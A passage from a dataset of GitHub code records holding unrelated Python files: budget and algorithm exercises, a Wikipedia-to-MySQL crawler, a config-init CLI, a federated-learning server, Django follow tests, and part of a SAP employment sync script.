print(info.get_df().head())","repo_name":"KevTeng/Coin_tracker","sub_path":"indicators/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73476602812","text":"import os\nimport csv\n\nbudget_data=os.path.join(\"budget_data.csv\")\n\ntotal_months = []\ntotal_PL = []\nmonthly_PL_change = []\n \nwith open(budget_data, newline='') as csvfile:\n\n csvreader = csv.reader(csvfile,delimiter=\",\") \n header = next(csvreader) \n\n for row in csvreader: \n total_months.append(row[0])\n total_PL.append(int(row[1]))\n\n for i in range(len(total_PL)-1):\n monthly_PL_change.append(total_PL[i+1]-total_PL[i])\n \nmax_increase_value = max(monthly_PL_change)\nmax_decrease_value = min(monthly_PL_change)\n\nmax_increase_month = monthly_PL_change.index(max(monthly_PL_change)) + 1\nmax_decrease_month = monthly_PL_change.index(min(monthly_PL_change)) + 1 \n\nprint(\"Financial Analysis\")\nprint(\"----------------------------\")\nprint(f\"Total Months: {len(total_months)}\")\nprint(f\"Total: ${sum(total_PL)}\")\nprint(f\"Average Change: ${round(sum(monthly_PL_change)/len(monthly_PL_change),2)}\")\nprint(f\"Greatest Increase in Profits: {total_months[max_increase_month]} (${(str(max_increase_value))})\")\nprint(f\"Greatest Decrease in Profits: {total_months[max_decrease_month]} (${(str(max_decrease_value))})\")\n\nwrite_file = f\"pybank_analysis.txt\"\n\nfilewriter = open(write_file, mode = 'w')\n\nfilewriter.write(\"Financial Analysis\\n\")\nfilewriter.write(\"--------------------------\\n\")\nfilewriter.write(f\"Total Months: {len(total_months)}\\n\")\nfilewriter.write(f\"Total: ${sum(total_PL)}\\n\")\nfilewriter.write(f\"Average Change:${round(sum(monthly_PL_change)/len(monthly_PL_change),2)}\\n\")\nfilewriter.write(f\"Greatest Increase in Profits: {total_months[max_increase_month]} (${(str(max_increase_value))})\\n\")\nfilewriter.write(f\"Greatest Decrease in Profits: {total_months[max_decrease_month]} (${(str(max_decrease_value))})\\n\")\nfilewriter.close()","repo_name":"ginak329/python-challenge","sub_path":"pybank.py","file_name":"pybank.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74518118010","text":"# Given an array of numbers nums, in which exactly two elements appear only once and all the other elements appear exactly twice. Find the two elements that appear only once.\nimport unittest\n\nclass test(unittest.TestCase):\n def test1(self):\n self.assertEqual(\n singleNumber([1,2,1,3,2,5]),\n [3,5]\n )\n\ndef singleNumber(nums):\n hist = {}\n result = []\n \n for i in range(len(nums)):\n if nums[i] in hist:\n hist[nums[i]] += 1\n else:\n hist[nums[i]] = 1\n \n for k, v in hist.items():\n if v == 1:\n result.append(k)\n \n return result\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"cliffpham/algos_data_structures","sub_path":"algos/loops/single_number_III.py","file_name":"single_number_III.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69943146171","text":"#from urllib.request import urlretrieve\n#from urllib.request import urlopen\n#from bs4 import BeautifulSoup\n\n#html = urlopen(\"http://www.pythonscraping.com\")\n#bsObj = BeautifulSoup(html)\n#imageLocation = bsObj.find(\"a\", {\"id\": \"logo\"}).find(\"img\")[\"src\"]\n#urlretrieve (imageLocation, \"logo.jpg\")\n\n\n#import os\n#import re\n#from urllib.request import urlretrieve\n#from urllib.request import urlopen\n#from bs4 import BeautifulSoup\n\n#downloadDirectory = \"downloaded\"\n#baseUrl = \"http://pythonscraping.com\"\n\n#def getAbsoluteURL(baseUrl, source):\n# if source.startswith(\"http://www.\"):\n# url = \"http://\"+source[11:]\n# elif source.startswith(\"http://\"):\n# url = source\n# elif source.startswith(\"www.\"):\n# url = source[4:]\n# url = \"http://\"+source\n# else:\n# url = baseUrl+\"/\"+source\n# if baseUrl not in url:\n# return None\n# return url\n\n#def getDownloadPath(baseUrl, absoluteUrl, downloadDirectory):\n# path = absoluteUrl.replace(\"www.\", \"\")\n# path = path.replace(baseUrl, \"\")\n# path = re.sub(\"\\?.*\", \"\", path) # 把问号开头的字符串都替换为空\n# path = downloadDirectory+path\n# directory = os.path.dirname(path)\n# if not os.path.exists(directory):\n# os.makedirs(directory)\n# return path\n\n#html = urlopen(\"http://www.pythonscraping.com\")\n#bsObj = BeautifulSoup(html)\n#downloadList = bsObj.findAll(src=True)\n#for download in downloadList:\n# fileUrl = getAbsoluteURL(baseUrl, download[\"src\"])\n# if fileUrl is not None:\n# print(fileUrl)\n# try:\n# urlretrieve(fileUrl, getDownloadPath(baseUrl, fileUrl, downloadDirectory))\n# except urlopen.urllib.request.ContentTooShortError:\n# print\n# 'Network conditions is not good.Reloading.'\n# #urlretrieve(fileUrl, getDownloadPath(baseUrl, fileUrl, downloadDirectory))\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\nimport pymysql\n\nconn = pymysql.connect(host='192.168.9.109', unix_socket='/tmp/mysql.sock',user='root', passwd='root', db='python', charset='utf8')\ncur = conn.cursor()\n\ndef store(title, content):\n cur.execute(\"USE python\")\n cur.execute(\"INSERT INTO pages (title, content) VALUES (\\\"%s\\\",\\\"%s\\\")\", (title, content))\n random.seed(datetime.datetime.now())\n cur.connection.commit()\n\ndef getLinks(articleUrl):\n html = urlopen(\"http://en.wikipedia.org\"+articleUrl)\n bsObj = BeautifulSoup(html)\n title = bsObj.find(\"h1\").get_text()\n content = bsObj.find(\"div\", {\"id\":\"mw-content-text\"}).find(\"p\").get_text()\n store(title, content)\n return bsObj.find(\"div\", {\"id\":\"bodyContent\"}).findAll(\"a\",href=re.compile(\"^(/wiki/)((?!:).)*$\"))\n\nlinks = getLinks(\"/wiki/Kevin_Bacon\")\ntry:\n while len(links) > 0:\n newArticle = links[random.randint(0, len(links)-1)].attrs[\"href\"]\n print(newArticle)\n links = getLinks(newArticle)\nfinally:\n cur.close()\n conn.close()","repo_name":"yxdongshine/depthLearning","sub_path":"com/yxd/crawler/dbIntoBase.py","file_name":"dbIntoBase.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27118846928","text":"# -*- coding: utf-8 -*-\n# (c) 2020-2022 Martin Wendt and contributors; see https://github.com/mar10/yabs\n# Licensed under the MIT license: https://www.opensource.org/licenses/mit-license.php\n\"\"\"\n\"\"\"\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\n\nimport click\nfrom jinja2 import Environment, PackageLoader, select_autoescape\n\nfrom .util import datetime_to_iso\n\n\ndef handle_init_command(parser: ArgumentParser, args: Namespace):\n res = run(parser, args)\n return res\n\n\ndef run(parser: ArgumentParser, args: Namespace):\n\n target = Path(args.filename)\n # target = Path(\".\") / \"new-yabs.yaml\"\n target = target.absolute()\n if not target.suffix:\n target = target.with_suffix(\".yaml\")\n if target.suffix != \".yaml\":\n raise click.BadArgumentUsage(f\"Expected `.yaml` extension: {target}\")\n if target.exists():\n click.confirm(f\"Overwrite {target} ?\", abort=True)\n else:\n click.echo(f\"Creating {target}...\")\n\n full_repo_name = click.prompt(\"GitHub Repo name (format: USER/PROJECT)\", type=str)\n if full_repo_name.count(\"/\") != 1:\n raise click.BadParameter(full_repo_name)\n\n github_token_env_name = click.prompt(\n \"GitHub OAUTH token environment variable\", default=\"GITHUB_OAUTH_TOKEN\"\n )\n\n context = {\n \"date\": datetime_to_iso(),\n \"full_repo_name\": full_repo_name,\n \"github_token_env_name\": github_token_env_name,\n }\n file_type = click.prompt(\n \"Type\",\n type=click.Choice({\"full\", \"compact\"}),\n default=\"full\",\n )\n click.confirm(f\"Create {target} ?\", abort=True, default=True)\n\n _copy_template(f\"yabs-{file_type}.yaml\", target, context)\n\n\ndef _copy_template(tmpl_name: str, target: Path, ctx: dict) -> None:\n env = Environment(\n loader=PackageLoader(\"yabs\"), # defaults to 'templates' folder\n autoescape=select_autoescape(),\n )\n template = env.get_template(tmpl_name)\n expanded = template.render(**ctx)\n # logger.info(\"Writing {:,} bytes to {!r}...\".format(len(tmpl), target_path))\n with target.open(\"wt\") as fp:\n fp.write(expanded)\n return\n","repo_name":"mar10/yabs","sub_path":"yabs/cmd_init.py","file_name":"cmd_init.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"8460907404","text":"import torch\nimport os\nimport numpy as np\nimport h5py\nimport copy\nimport time\nimport random\n\n\nclass Server(object):\n def __init__(self, dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,\n num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal, \n time_threthold):\n # Set up the main attributes\n self.dataset = dataset\n self.global_rounds = global_rounds\n self.local_steps = local_steps\n self.batch_size = batch_size\n self.learning_rate = learning_rate\n self.global_model = copy.deepcopy(model)\n self.join_clients = join_clients\n self.num_clients = num_clients\n self.algorithm = algorithm\n self.time_select = time_select\n self.goal = goal\n self.time_threthold = time_threthold\n\n self.clients = []\n self.selected_clients = []\n self.train_slow_clients = []\n self.send_slow_clients = []\n\n self.uploaded_weights = []\n self.uploaded_models = []\n\n self.rs_train_acc = []\n self.rs_train_loss = []\n self.rs_test_acc = []\n\n self.times = times\n self.eval_gap = eval_gap\n self.client_drop_rate = client_drop_rate\n self.train_slow_rate = train_slow_rate\n self.send_slow_rate = send_slow_rate\n self.timestamp = None\n\n # random select slow clients\n def select_slow_clients(self, slow_rate):\n slow_clients = [False for i in range(self.num_clients)]\n idx = [i for i in range(self.num_clients)]\n idx_ = np.random.choice(idx, int(slow_rate * self.num_clients))\n for i in idx_:\n slow_clients[i] = True\n\n return slow_clients\n\n def set_slow_clients(self):\n self.train_slow_clients = self.select_slow_clients(\n self.train_slow_rate)\n self.send_slow_clients = self.select_slow_clients(\n self.send_slow_rate)\n\n def select_clients(self):\n selected_clients = []\n if self.time_select:\n clients_info = []\n for i, client in enumerate(self.clients):\n clients_info.append(\n (i, client.train_time_cost['total_cost'] + client.send_time_cost['total_cost']))\n clients_info = sorted(clients_info, key=lambda x: x[1])\n left_idx = np.random.randint(\n 0, self.num_clients - self.join_clients)\n selected_clients = [self.clients[clients_info[i][0]]\n for i in range(left_idx, left_idx + self.join_clients)]\n else:\n selected_clients = list(np.random.choice(self.clients, self.join_clients, replace=False))\n\n return selected_clients\n\n def send_models(self):\n assert (len(self.clients) > 0)\n\n for client in self.clients:\n start_time = time.time()\n\n if client.send_slow:\n time.sleep(0.1 * np.abs(np.random.rand()))\n\n client.set_parameters(copy.deepcopy(self.global_model))\n\n client.send_time_cost['num_rounds'] += 1\n client.send_time_cost['total_cost'] += 2 * (time.time() - start_time)\n\n def send_parameters_fedbn(self): #added\n assert (len(self.clients) > 0)\n\n for client in self.clients:\n start_time = time.time()\n\n if client.send_slow:\n time.sleep(0.1 * np.abs(np.random.rand()))\n\n client.set_parameters_fedbn(copy.deepcopy(self.global_model)) #changed\n\n client.send_time_cost['num_rounds'] += 1\n client.send_time_cost['total_cost'] += 2 * (time.time() - start_time)\n\n def send_parameters_fedrep(self): #added\n assert (len(self.clients) > 0)\n\n for client in self.clients:\n start_time = time.time()\n\n if client.send_slow:\n time.sleep(0.1 * np.abs(np.random.rand()))\n\n client.set_parameters_fedrep(copy.deepcopy(self.global_model)) #changed\n\n client.send_time_cost['num_rounds'] += 1\n client.send_time_cost['total_cost'] += 2 * (time.time() - start_time)\n\n\n def receive_models(self):\n assert (len(self.selected_clients) > 0)\n\n active_clients = random.sample(\n self.selected_clients, int((1-self.client_drop_rate) * self.join_clients))\n\n active_train_samples = 0\n for client in active_clients:\n active_train_samples += client.train_samples\n\n self.uploaded_weights = []\n self.uploaded_models = []\n for client in active_clients:\n client_time_cost = client.train_time_cost['total_cost'] / client.train_time_cost['num_rounds'] + \\\n client.send_time_cost['total_cost'] / client.send_time_cost['num_rounds']\n if client_time_cost <= self.time_threthold:\n self.uploaded_weights.append(client.train_samples / active_train_samples)\n self.uploaded_models.append(copy.deepcopy(client.model))\n\n def add_parameters(self, w, client_model):\n for server_param, client_param in zip(self.global_model.parameters(), client_model.parameters()):\n server_param.data += client_param.data.clone() / self.join_clients\n\n def aggregate_parameters(self):\n assert (len(self.uploaded_models) > 0)\n\n for param in self.global_model.parameters():\n param.data = torch.zeros_like(param.data)\n \n for w, client_model in zip(self.uploaded_weights, self.uploaded_models):\n self.add_parameters(w, client_model)\n \n\n # def aggregate_parameters(self):\n\n # for param in self.global_model.parameters():\n # param.data = torch.zeros_like(param.data)\n\n # active_train_samples = 0\n # for client in self.selected_clients:\n # active_train_samples += client.train_samples\n\n # for client in self.selected_clients:\n # self.add_parameters(client, client.train_samples / active_train_samples)\n\n\n def save_global_model(self):\n model_path = os.path.join(\"models\", self.dataset)\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n torch.save(self.global_model, os.path.join(model_path, self.algorithm + \"_server\" + \".pt\"))\n\n # def load_model(self):\n # model_path = os.path.join(\"models\", self.dataset, \"server\" + \".pt\")\n # assert (os.path.exists(model_path))\n # self.global_model = torch.load(model_path)\n\n # def model_exists(self):\n # return os.path.exists(os.path.join(\"models\", self.dataset, \"server\" + \".pt\"))\n\n def save_results(self):\n algo = self.dataset + \"_\" + self.algorithm\n result_path = \"../results/\"\n if not os.path.exists(result_path):\n os.makedirs(result_path)\n\n if (len(self.rs_test_acc) & len(self.rs_train_acc) & len(self.rs_train_loss)):\n algo = algo + \"_\" + self.goal + \"_\" + str(self.times)\n with h5py.File(result_path + \"{}.h5\".format(algo), 'w') as hf:\n hf.create_dataset('rs_test_acc', data=self.rs_test_acc)\n hf.create_dataset('rs_train_acc', data=self.rs_train_acc)\n hf.create_dataset('rs_train_loss', data=self.rs_train_loss)\n\n def test_accuracy(self):\n num_samples = []\n tot_correct = []\n for c in self.clients:\n ct, ns = c.test_accuracy()\n tot_correct.append(ct*1.0)\n num_samples.append(ns)\n\n ids = [c.id for c in self.clients]\n\n return ids, num_samples, tot_correct\n\n def train_accuracy_and_loss(self):\n num_samples = []\n tot_correct = []\n losses = []\n for c in self.clients:\n ct, cl, ns = c.train_accuracy_and_loss()\n tot_correct.append(ct*1.0)\n num_samples.append(ns)\n losses.append(cl*1.0)\n\n ids = [c.id for c in self.clients]\n\n return ids, num_samples, tot_correct, losses\n\n # evaluate all clients\n def evaluate(self):\n stats = self.test_accuracy()\n stats_train = self.train_accuracy_and_loss()\n\n test_acc = sum(stats[2])*1.0 / sum(stats[1])\n train_acc = sum(stats_train[2])*1.0 / sum(stats_train[1])\n train_loss = sum(stats_train[3])*1.0 / sum(stats_train[1])\n \n self.rs_test_acc.append(test_acc)\n self.rs_train_acc.append(train_acc)\n self.rs_train_loss.append(train_loss)\n self.print_(test_acc, train_acc, train_loss)\n\n for x,y in zip(stats[2],stats[1]):\n #print(\"------------------------------\")\n print(\"client Accurancy: \", x*1.0/y)\n\n def print_(self, test_acc, train_acc, train_loss):\n print(\"Average Test Accurancy: {:.4f}\".format(test_acc))\n print(\"Average Train Accurancy: {:.4f}\".format(train_acc))\n print(\"Average Train Loss: {:.4f}\".format(train_loss))\n print(\"----------------------------------------\")\n","repo_name":"wanglikuan/0708_byol2","sub_path":"BYOL-2/serverbase.py","file_name":"serverbase.py","file_ext":"py","file_size_in_byte":8969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"10625017848","text":"import math\ntt = int(input())\n\nfor _ in range(tt):\n n,m,k = map(int, input().split())\n\n cpp = n//k\n if m <= cpp:\n print(m)\n else:\n out = cpp - math.ceil((m-cpp)/(k-1))\n print(out)","repo_name":"Noprop/codeforces","sub_path":"striver/maths/berlandpoker.py","file_name":"berlandpoker.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24012526389","text":"from django.test import Client, TestCase\nfrom django.urls import reverse\nfrom django.core.cache import cache\nfrom itertools import islice\n\nfrom ..models import Group, Post, Follow, User\n\n\nclass FollowingTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username=\"auth\")\n cls.user2 = User.objects.create_user(username=\"NotAuth\")\n\n cls.COUNT_CREATW_POST = 2\n batch_size = 1\n cls.post = (\n Post(\n author=cls.user,\n group=Group.objects.create(\n title=\"Тестовая группа %s\" % i,\n slug=\"test-slug%s\" % i,\n description=\"Тестовое описание\",\n ),\n text=\"Test %s\" % i,\n )\n for i in range(cls.COUNT_CREATW_POST)\n )\n while True:\n batch = list(islice(cls.post, batch_size))\n if not batch:\n break\n Post.objects.bulk_create(batch, batch_size)\n\n def setUp(self):\n cache.clear()\n # Создаем авторизованный клиент\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n # Создаем неавторизованный клиент\n self.guest_client = Client()\n # Создаем автора\n self.author = Client()\n # Авторизуем автора\n self.author.force_login(self.user)\n # Создаем не автора\n self.second_author = Client()\n self.second_author.force_login(self.user2)\n\n def test_autoriz_user_following(self):\n \"\"\"Проверка подписки пользователя на других\"\"\"\n count_follow = Follow.objects.count()\n post = Post.objects.first()\n tamplate_follow = \"posts:profile_follow\"\n self.second_author.get(\n reverse(tamplate_follow, kwargs={\"username\": post.author})\n )\n # проверяем подписку\n self.assertEqual(Follow.objects.count(), count_follow + 1)\n self.assertEqual(Follow.objects.last().author, post.author)\n self.assertEqual(Follow.objects.last().user, self.user2)\n\n def test_autoriz_user_unfollowing(self):\n \"\"\"Проверка отписки пользователя от автора\"\"\"\n tamplate_unfollow = \"posts:profile_unfollow\"\n count_follow = Follow.objects.count()\n post = Post.objects.first()\n self.second_author.get(\n reverse(tamplate_unfollow, kwargs={\"username\": post.author})\n )\n self.assertEqual(Follow.objects.count(), count_follow)\n\n def test_new_post_in_follow_list(self):\n \"\"\"Проверка что пост не появился у того, кто не подписан\"\"\"\n post = Post.objects.first()\n cache.clear()\n another_user = User.objects.create(username=\"NoName\")\n self.authorized_client.force_login(another_user)\n response_another_follower = self.authorized_client.get(\n reverse(\"posts:follow_index\")\n )\n self.assertNotIn(post, response_another_follower.context[\"page_obj\"])\n","repo_name":"Viteron/hw05_final","sub_path":"yatube/posts/tests/test_following.py","file_name":"test_following.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43245803255","text":"import argparse\nimport datetime\nimport os\n\nimport cereconf\n\nfrom Cerebrum import Errors\nfrom Cerebrum.database import Database\nfrom Cerebrum.Utils import Factory\nfrom Cerebrum.Utils import NotSet\nfrom Cerebrum.utils.funcwrap import memoize\nfrom Cerebrum.modules.no.hia.mod_sap_utils import load_expired_employees\nfrom Cerebrum.modules.no.hia.mod_sap_utils import load_invalid_employees\nfrom Cerebrum.modules.no.hia.mod_sap_utils import make_employment_iterator\nfrom Cerebrum.modules.no.Constants import SAPLonnsTittelKode\n\n\ndef sap_employment2affiliation(sap_lonnstittelkode):\n \"\"\"Decide the affiliation to assign to a particular employment entry.\n\n The rules are:\n\n * aff = ANSATT, and VIT/ØVR depending on lonnstittelkode, when:\n sap_lonnstittelkode != 20009999 (const.sap_9999_dummy_stillingskode)\n fo_kode != 9999\n\n * aff = TILKNYTTET/ekstern, when:\n sap_lonnstittelkode = 20009999 (const.sap_9999_dummy_stillingskode)\n fo_kode != 9999\n \"\"\"\n\n try:\n lonnskode = SAPLonnsTittelKode(sap_lonnstittelkode)\n kategori = lonnskode.get_kategori()\n if not isinstance(kategori, unicode):\n kategori = kategori.decode(Database.encoding)\n except Errors.NotFoundError:\n logger.warn(u\"No SAP.STELL/lønnstittelkode <%s> found in Cerebrum\",\n sap_lonnstittelkode)\n return None, None\n\n if lonnskode != constants.sap_9999_dummy_stillingskode:\n affiliation = constants.affiliation_ansatt\n status = {\n u'ØVR': constants.affiliation_status_ansatt_tekadm,\n u'VIT': constants.affiliation_status_ansatt_vitenskapelig}[kategori]\n else:\n affiliation = constants.affiliation_tilknyttet\n status = constants.affiliation_status_tilknyttet_ekstern\n\n return affiliation, status\n\n\n@memoize\ndef get_ou_id(sap_ou_id):\n \"\"\"\n Map SAP OU id to Cerebrum entity_id.\n \"\"\"\n\n ou = Factory.get(\"OU\")(database)\n try:\n ou.find_by_external_id(constants.externalid_sap_ou, sap_ou_id)\n return int(ou.entity_id)\n except Errors.NotFoundError:\n return None\n\n\ndef get_person(sap_person_id):\n \"\"\"\n Map SAP ansattnr to Cerebrum entity_id.\n \"\"\"\n\n person = Factory.get(\"Person\")(database)\n try:\n person.find_by_external_id(constants.externalid_sap_ansattnr,\n sap_person_id)\n return person\n except Errors.NotFoundError:\n return None\n\n\ndef cache_db_affiliations():\n \"\"\"Return a cache with all affilliation_ansatt.\n\n The cache itself is a mapping person_id -> person-mapping, where\n person-mapping is a mapping ou_id -> status. I.e. with each person_id we\n associate all affiliation_ansatt that the person has indexed by ou_id.\n \"\"\"\n\n person = Factory.get(\"Person\")(database)\n # A cache dictionary mapping person -> D, where D is a mapping (ou_id,\n # affiliation) -> status. Why such a weird arrangement? Well, the API\n # makes it easier to delete all affiliations one person at a time\n # (therefore, person_id as the first-level key).\n #\n # Then, if an affiliation status changes, we cannot just yank the\n # affiliation out (because there would be a FK to it) and we need to\n # update, rather than remove-add it. Thus the magic with ou/affiliation as\n # the second key.\n cache = dict()\n for row in person.list_affiliations(\n source_system=constants.system_sap,\n affiliation=(constants.affiliation_ansatt,\n constants.affiliation_tilknyttet)):\n p_id, ou_id, affiliation, status = [int(row[x]) for x in\n (\"person_id\", \"ou_id\",\n \"affiliation\", \"status\",)]\n cache.setdefault(p_id, {})[(ou_id, affiliation)] = status\n\n return cache\n\n\ndef remove_affiliations(cache):\n \"Remove all affiliations in cache from Cerebrum.\"\n\n # cache is mapping person-id => mapping (ou-id, aff) => status. All these\n # mappings are all for affiliation_ansatt.\n person = Factory.get(\"Person\")(database)\n logger.debug(\"Removing affiliations for %d people\", len(cache))\n\n for person_id in cache:\n try:\n person.clear()\n person.find(person_id)\n except Errors.NotFoundError:\n logger.warn(\"person_id %s is in cache, but not in Cerebrum\",\n person_id)\n continue\n\n # person is here, now we delete all the affiliation_ansatt\n # affiliations.\n handle = True\n if 'handled' in cache[person_id]:\n handle = not cache[person_id]['handled']\n del cache[person_id]['handled']\n for (ou_id, affiliation) in cache[person_id].iterkeys():\n if handle:\n person.delete_affiliation(ou_id,\n affiliation,\n constants.system_sap)\n logger.debug(\"Removed aff=%s/ou_id=%s for %s\",\n constants.PersonAffiliation(affiliation),\n ou_id, person_id)\n\n\ndef synchronize_affiliations(aff_cache, person, ou_id,\n affiliation, status):\n \"\"\"Register/update an affiliation for a specific person.\n\n aff_cache is updated destructively.\n\n person must be associated with a person in the db.\n \"\"\"\n\n # A log message has already been issued...\n if (affiliation, status) == (None, None):\n return\n\n logger.debug(\"Registering affiliation %s/%s for person_id %s\",\n affiliation, status, person.entity_id)\n\n # For accessing aff_cache\n key_level1 = int(person.entity_id)\n key_level2 = (int(ou_id), int(affiliation))\n\n # Ok, now we have everything we need to register/adjusted affiliations\n # case 1: the affiliation did not exist => make a new affiliation\n person.populate_affiliation(constants.system_sap,\n ou_id,\n affiliation,\n status)\n\n if key_level1 not in aff_cache:\n aff_cache[key_level1] = {'handled': True}\n else:\n aff_cache[key_level1]['handled'] = True\n if key_level2 not in aff_cache[key_level1]:\n logger.debug(\"New affiliation %s (status: %s) for (person_id: %s)\",\n affiliation, status, person.entity_id)\n\n # case 2: the affiliation did exist => update aff.status and fix the cache\n else:\n cached_status = aff_cache[key_level1][key_level2]\n # Update cache info (we'll need this to delete obsolete\n # affiliations from Cerebrum). Remember that if aff.status is the\n # only thing changing, then we should not delete the \"old\"\n # aff.status entry. Thus, regardless of the aff.status, we must\n # clear the cache.\n del aff_cache[key_level1][key_level2]\n if not aff_cache[key_level1]:\n del aff_cache[key_level1]\n\n # The affiliation is there, but the status is different => update\n if cached_status != int(status):\n logger.debug(\"Updating affiliation status %s => %s for \"\n \"(p_id: %s)\",\n str(constants.PersonAffStatus(cached_status)),\n status, person.entity_id)\n else:\n logger.debug(\"Refreshing last seen for aff %s for (person id: %s)\",\n status, person.entity_id)\n\n\ndef process_affiliations(employment_file, person_file, use_fok,\n people_to_ignore=None):\n \"\"\"Parse employment_file and determine all affiliations.\n\n There are roughly 3 distinct parts:\n\n #. Cache all the affiliations in Cerebrum\n #. Scan the file and compare the file data with the cache. When there is a\n match, remove the entry from the cache.\n #. Remove from Cerebrum whatever is left in the cache (once we are done\n with the file, the cache contains those entries that were in Cerebrum\n \"\"\"\n\n expired = load_expired_employees(file(person_file), use_fok, logger)\n\n # First we cache all existing affiliations. It's a mapping person-id =>\n # mapping (ou-id, affiliation) => status.\n affiliation_cache = cache_db_affiliations()\n person_cache = dict()\n\n def person_cacher(empid):\n ret = person_cache.get(empid, NotSet)\n if ret is NotSet:\n ret = person_cache[empid] = get_person(empid)\n return ret\n\n for tpl in make_employment_iterator(\n file(employment_file), use_fok, logger):\n if not tpl.valid():\n logger.debug(\"Ignored invalid entry for person while \"\n \"processing affiliation: «%s»\",\n tpl.sap_ansattnr)\n continue\n\n if people_to_ignore and tpl.sap_ansattnr in people_to_ignore:\n logger.debug(\"Invalid person with sap_id=%s\", tpl.sap_ansattnr)\n continue\n\n if tpl.sap_ansattnr in expired:\n logger.debug(\"Person sap_id=%s is no longer an employee; \"\n \"all employment info will be ignored\",\n tpl.sap_ansattnr)\n continue\n\n # is the entry within a valid time frame?\n # The shift by 180 days has been requested by UiA around 2007-03-27\n if not tpl.start_date or not tpl.end_date:\n logger.debug(\"Entry %s has no timeframe\", tpl)\n continue\n if not (tpl.start_date -\n datetime.timedelta(days=180) <= datetime.date.today() <=\n tpl.end_date):\n logger.debug(\"Entry %s has wrong timeframe (start: %s, end: %s)\",\n tpl, tpl.start_date, tpl.end_date)\n continue\n\n ou_id = get_ou_id(tpl.sap_ou_id)\n if ou_id is None:\n logger.warn(\"Cannot map SAP OU %s to Cerebrum ou_id (employment \"\n \"for person sap_id=%s).\",\n tpl.sap_ou_id, tpl.sap_ansattnr)\n continue\n\n person = person_cacher(tpl.sap_ansattnr)\n if person is None:\n logger.warn(\"Cannot map SAP ansattnr %s to cerebrum person_id\",\n tpl.sap_ansattnr)\n continue\n\n (affiliation,\n affiliation_status) = sap_employment2affiliation(tpl.lonnstittel)\n\n synchronize_affiliations(affiliation_cache,\n person,\n ou_id, affiliation,\n affiliation_status)\n\n # We are done with fetching updates from file.\n # Need to write persons\n for p in person_cache.values():\n if p is None:\n continue\n logger.info(\"Writing cached affs for person id:%s\", p.entity_id)\n p.write_db()\n\n # All the affiliations left in the cache exist in Cerebrum, but NOT in the\n # datafile. Thus delete them!\n remove_affiliations(affiliation_cache)\n\n\ndef cache_db_employments():\n \"\"\"\n Preload all existing employment data.\n\n Note that we just need the primary keys here.\n \"\"\"\n\n logger.debug(\"Preloading all existing employments\")\n result = set()\n person = Factory.get(\"Person\")(database)\n for row in person.search_employment(source_system=constants.system_sap):\n key = (row[\"person_id\"], row[\"ou_id\"], row[\"description\"],\n row[\"source_system\"])\n result.add(key)\n\n logger.debug(\"Done preloading all existing employments\")\n return result\n\n\ndef remove_db_employments(remaining_employments):\n \"\"\"\n Nuke whatever remains of employments.\n\n Whichever keys remain in remaining_employments, they exist in the db, but\n not in the source file.\n \"\"\"\n\n logger.debug(\"Will delete %s remaining employments\",\n len(remaining_employments))\n person = Factory.get(\"Person\")(database)\n for (pid, ou_id, title, source) in remaining_employments:\n person.clear()\n person.find(pid)\n person.delete_employment(ou_id, title, source)\n # If person has a work_title defined and it matches the current\n # employment's title, remove work_title as well.\n try:\n if title == person.get_name_with_language(constants.work_title,\n constants.language_nb):\n person.delete_name_with_language(constants.work_title,\n constants.language_nb)\n except Errors.NotFoundError:\n pass\n\n logger.debug(\"Completed deletion\")\n\n\ndef synchronise_employment(employment_cache, tpl, person, ou_id):\n \"\"\"\n Synchronise a specific employment entry with the database.\n\n Updates employment_cache destructively.\n \"\"\"\n\n try:\n employment = SAPLonnsTittelKode(tpl.lonnstittel)\n description = employment.description\n except Errors.NotFoundError as e:\n logger.warn(\"Unknown lonnstittelkode %s for person with SAP-id: %s\",\n tpl.lonnstittel, tpl.sap_ansattnr)\n logger.warn(e)\n return\n\n if \" \" not in description:\n logger.debug(\"Employment type %s for person %s\"\n \" missing code/description\",\n description, person.entity_id)\n return\n\n code, title = description.split(\" \", 1)\n if not code.isdigit():\n logger.debug(\"Employment for %s is missing code/title: %s\",\n person.entity_id, description)\n return\n\n key = (person.entity_id, ou_id, title, constants.system_sap)\n if key in employment_cache:\n employment_cache.remove(key)\n\n try:\n float(tpl.percentage)\n except TypeError:\n logger.debug(\"Invalid employment fraction specification in %s\",\n str(tpl))\n return\n\n if tpl.start_date and tpl.end_date:\n # This will either insert or update\n person.add_employment(ou_id, title, constants.system_sap,\n tpl.percentage, tpl.start_date, tpl.end_date,\n code, tpl.stillingstype == 'H')\n\n\ndef process_employments(employment_file, use_fok, people_to_ignore=None):\n \"Synchronise the data in person_employment based on the latest SAP file.\"\n\n logger.debug(\"processing employments\")\n employment_cache = cache_db_employments()\n for tpl in make_employment_iterator(\n file(employment_file), use_fok, logger):\n if not tpl.valid():\n logger.debug(\"Ignored invalid entry for person while \"\n \"processing employment: «%s»\",\n tpl.sap_ansattnr)\n continue\n\n if people_to_ignore and tpl.sap_ansattnr in 